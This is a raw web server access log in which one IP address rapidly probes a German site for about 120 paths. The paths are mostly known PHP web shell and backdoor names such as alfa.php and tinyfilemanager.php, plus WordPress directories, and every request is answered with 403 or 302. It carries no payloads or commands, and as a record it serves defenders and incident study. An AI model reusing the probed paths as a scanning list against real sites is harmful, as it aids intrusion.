146.70.192.182 website*x.de – – [14/Sep/2025:06:36:41 +0200] „GET /wp-admin/css/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:41 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /contact.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /wp-content/themes/pridmag/db.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /ws.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /file/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /wp-2019.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:42 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:43 +0200] „GET /.well-known/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:43 +0200] „GET /assets/images/doc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:43 +0200] „GET /z.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:43 +0200] „GET /wp-admin/network/natural.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:43 +0200] „GET /dashboard.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:44 +0200] „GET /wp-admin/css/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:44 +0200] „GET /css.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:44 +0200] „GET /wp-admin/images/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:45 +0200] „GET /wp-content/updates.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:45 +0200] „GET /xx.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:45 +0200] „GET /geju.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:45 +0200] „GET /wp-content/themes/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:46 +0200] „GET /radio.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:46 +0200] „GET /mah/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:46 +0200] „GET /wp-admin/includes/nav.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:47 +0200] „GET /wp-includes/assets/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:47 +0200] „GET /wp-content/upgrade/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:47 +0200] „GET /x.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:48 +0200] „GET /admin/upload/css.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:48 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:48 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:48 +0200] „GET /byp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:49 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:49 +0200] „GET /license.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:49 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:49 +0200] „GET /wp-includes/SimplePie/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:49 +0200] „GET /wp-content/themes/deeto/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:50 +0200] „GET /cgi-bin/file.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:50 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:50 +0200] „GET /wp-admin/install.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:50 +0200] „GET /alfa-rex.php7 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:50 +0200] „GET /wp-includes/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:51 +0200] „GET /2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:51 +0200] „GET /cc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:51 +0200] „GET /wp-content/plugins/seoplugins/mar.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:52 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:52 +0200] „GET /about/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:52 +0200] „GET /jp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:52 +0200] „GET /wp-content/plugins/view-more/ioxi.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:52 +0200] „GET /wp-admin/maint/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:53 +0200] „GET /wp-class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:53 +0200] „GET /wp-signin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:53 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:53 +0200] „GET /f35.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:53 +0200] „GET /blog.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:54 +0200] „GET /wp-Owl.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:54 +0200] „GET /moon.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:54 +0200] „GET /wp-blog.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:54 +0200] „GET /wp-admin/admin-ajax.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:55 +0200] „GET /wp-includes/css/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:55 +0200] „GET /wp-content/upgrade-temp-backup/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:55 +0200] „GET /gg.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:55 +0200] „GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:56 +0200] „GET /eagle.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:56 +0200] „GET /wp-admin/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:56 +0200] „GET /lufix.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:56 +0200] „GET /ant.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:56 +0200] „GET /cux.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:57 +0200] „GET /i.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:57 +0200] „GET /wp-error.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:57 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:57 +0200] „GET /send.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:58 +0200] „GET /wp-content/plugins/init-help/init.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:58 +0200] „GET /wp-includes/pomo/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:58 +0200] „GET /admin.php?attempt=1 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:58 +0200] „GET /log.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:58 +0200] „GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:59 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:59 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:59 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:59 +0200] „GET /wp-blog-header.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:59 +0200] „GET /wp-admin/network/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:00 +0200] „GET /wp-admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:00 +0200] „GET /wp-content/packed.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:00 +0200] „GET /wp-includes/wp-atom.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:00 +0200] „GET /config.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:01 +0200] „GET /69.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:01 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:01 +0200] „GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:01 +0200] „GET /index/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:01 +0200] „GET /readme.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:12 +0200] „GET /wp-includes/assets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:12 +0200] „GET /files/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:12 +0200] „GET /wp-content/themes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:13 +0200] „GET /assets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:13 +0200] „GET /wp-includes/PHPMailer/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:13 +0200] „GET /wp-includes/js/codemirror/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:13 +0200] „GET /wp-includes/theme-compat/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:14 +0200] „GET /wp-admin/user/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:14 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:14 +0200] „GET /wp-includes/js/crop/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:15 +0200] „GET /wp-includes/html-api/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:15 +0200] „GET /wp-includes/blocks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:15 +0200] „GET /wp-includes/pomo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:15 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:16 +0200] „GET /assets/css/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:16 +0200] „GET /wp-includes/Text/Diff/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:16 +0200] „GET /wp-includes/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:16 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:17 +0200] „GET /wp-includes/Text/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:17 +0200] „GET /wp-includes/sodium_compat/src/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:17 +0200] „GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
